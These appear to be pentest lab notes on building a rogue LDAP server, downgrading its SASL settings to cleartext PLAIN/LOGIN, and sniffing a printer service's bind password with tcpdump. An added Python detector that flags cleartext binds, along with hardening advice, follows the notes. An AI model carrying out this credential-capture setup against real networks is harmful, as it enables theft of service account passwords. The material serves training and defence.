Rogue LDAP Server
sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
Omit initial configuration?: No
DNS domain name: target domain
Organization name: target domain
Administrator password: anything, but remember it
Database removed?: No
Move old database?: Yes
Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.
Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms, so that the server only offers the PLAIN and LOGIN methods. To do this, create a new LDIF file called olcSaslSecProps.ldif with the following content:
cat ./olcSaslSecProps.ldif
# olcSaslSecProps.ldif - lower the SASL security properties of the cn=config database
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
olcSaslSecProps: specifies the SASL security properties.
noanonymous: disables mechanisms that support anonymous login.
minssf: specifies the minimum acceptable security strength factor; 0 means no protection is required.
passcred: requires mechanisms that pass the client's credentials to the server.
Update configuration
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

We now have our LDAP server listening on port 389.
Capturing LDAP Credentials
sudo tcpdump -SX -i breachad tcp port 389
-S, --absolute-tcp-sequence-numbers: print absolute, rather than relative, TCP sequence numbers.
-X: when parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link-level header) in hex and ASCII. This is very handy for analysing new protocols. In the current implementation this flag may have the same effect as -XX if the packet is truncated.
With the capture running, the plaintext password that the printer service uses to bind against LDAP appears in the packet payload.
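The defensive counterpart of the capture above is to detect such binds on the wire. The following Python script is an added example, not part of the original notes: it implements just enough BER to decode an LDAP BindRequest (RFC 4511) from a raw TCP payload and flags any simple bind or SASL PLAIN/LOGIN bind that carries a secret over an unencrypted port-389 session, without printing the secret itself. The sample PDUs, DN, mechanism and password bytes are constructed inline and hypothetical; the script takes raw TCP payloads (as a capture tool would hand them over), not pcap files.

```python
"""Detect cleartext LDAP binds in raw TCP payloads (added example, not from the notes)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# BER / LDAP tags (RFC 4511 with X.690 encoding)
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
AUTH_SIMPLE = 0x80    # AuthenticationChoice.simple [0]: password in the clear
AUTH_SASL = 0xA3      # AuthenticationChoice.sasl [3]: SaslCredentials SEQUENCE
CLEARTEXT_SASL_MECHS = ("PLAIN", "LOGIN")  # mechanisms that ship the password itself


def ber(tag: int, value: bytes) -> bytes:
    """Encode one BER element with a definite length (used to build the samples)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_octets = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_octets)]) + length_octets + value


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode the BER element at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: the low 7 bits count the length octets that follow
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


@dataclass
class BindInfo:
    message_id: int
    version: int
    bind_dn: str
    method: str                 # "simple" or "sasl:<MECHANISM>"
    cleartext_secret_len: int   # bytes of secret sent in the clear, 0 if none


def parse_bind_request(payload: bytes) -> Optional[BindInfo]:
    """Return BindInfo for an LDAPMessage holding a BindRequest, else None."""
    tag, message, _ = read_tlv(payload, 0)
    if tag != SEQUENCE:
        return None
    tag, mid, pos = read_tlv(message, 0)
    if tag != INTEGER:
        return None
    tag, op, _ = read_tlv(message, pos)
    if tag != BIND_REQUEST:
        return None
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    tag, auth, _ = read_tlv(op, pos)
    info = BindInfo(int.from_bytes(mid, "big", signed=True), int.from_bytes(version, "big"),
                    name.decode("utf-8", "replace"), "unknown", 0)
    if tag == AUTH_SIMPLE:
        info.method, info.cleartext_secret_len = "simple", len(auth)
    elif tag == AUTH_SASL:
        _, mech, mpos = read_tlv(auth, 0)
        mech_name = mech.decode("ascii", "replace")
        info.method = "sasl:" + mech_name
        if mech_name.upper() in CLEARTEXT_SASL_MECHS and mpos < len(auth):
            _, creds, _ = read_tlv(auth, mpos)
            info.cleartext_secret_len = len(creds)
    return info


def classify(payload: bytes, dst_port: int = 389, tls: bool = False) -> str:
    """One verdict line per PDU; 'ALERT' marks credentials exposed on the wire."""
    info = parse_bind_request(payload)
    if info is None:
        return "ignore: not a BindRequest"
    if info.cleartext_secret_len == 0:
        return f"info: bind without cleartext secret (dn={info.bind_dn!r}, {info.method})"
    if tls:
        return f"ok: {info.method} bind for {info.bind_dn!r} protected by TLS"
    return (f"ALERT: cleartext credentials to port {dst_port}: dn={info.bind_dn!r} "
            f"method={info.method} secret_len={info.cleartext_secret_len}")


def scan(payloads: List[bytes], tls: bool = False) -> List[str]:
    """Classify captured payloads, alerts first so they are not missed."""
    verdicts = [classify(p, tls=tls) for p in payloads]
    return sorted(verdicts, key=lambda v: not v.startswith("ALERT"))


# Constructed sample PDUs (hypothetical DN, mechanism and password values).
SAMPLE_SIMPLE_BIND = ber(SEQUENCE, ber(INTEGER, b"\x01") + ber(BIND_REQUEST,
    ber(INTEGER, b"\x03") + ber(OCTET_STRING, b"cn=printer-svc,dc=example,dc=com")
    + ber(AUTH_SIMPLE, b"constructed-password")))
SAMPLE_SASL_PLAIN = ber(SEQUENCE, ber(INTEGER, b"\x02") + ber(BIND_REQUEST,
    ber(INTEGER, b"\x03") + ber(OCTET_STRING, b"")
    + ber(AUTH_SASL, ber(OCTET_STRING, b"PLAIN") + ber(OCTET_STRING, b"\x00user\x00pw"))))
SAMPLE_SASL_GSSAPI = ber(SEQUENCE, ber(INTEGER, b"\x03") + ber(BIND_REQUEST,
    ber(INTEGER, b"\x03") + ber(OCTET_STRING, b"")
    + ber(AUTH_SASL, ber(OCTET_STRING, b"GSSAPI") + ber(OCTET_STRING, b"\x60\x00"))))
SAMPLE_UNBIND = ber(SEQUENCE, ber(INTEGER, b"\x04") + bytes([0x42, 0x00]))  # UnbindRequest

if __name__ == "__main__":
    for line in scan([SAMPLE_SIMPLE_BIND, SAMPLE_SASL_PLAIN, SAMPLE_SASL_GSSAPI, SAMPLE_UNBIND]):
        print(line)
```

A simple bind with an empty password (anonymous) and SASL mechanisms such as GSSAPI or DIGEST-MD5 produce only an "info" line, because no reusable secret crosses the wire; the same simple bind seen inside a TLS or StartTLS session is reported as "ok". The `minssf=0` property set on the rogue server above is exactly what allows the "ALERT" cases to succeed, so the hardening on a legitimate directory is the inverse: a non-zero `minssf` and TLS for every bind that carries a password.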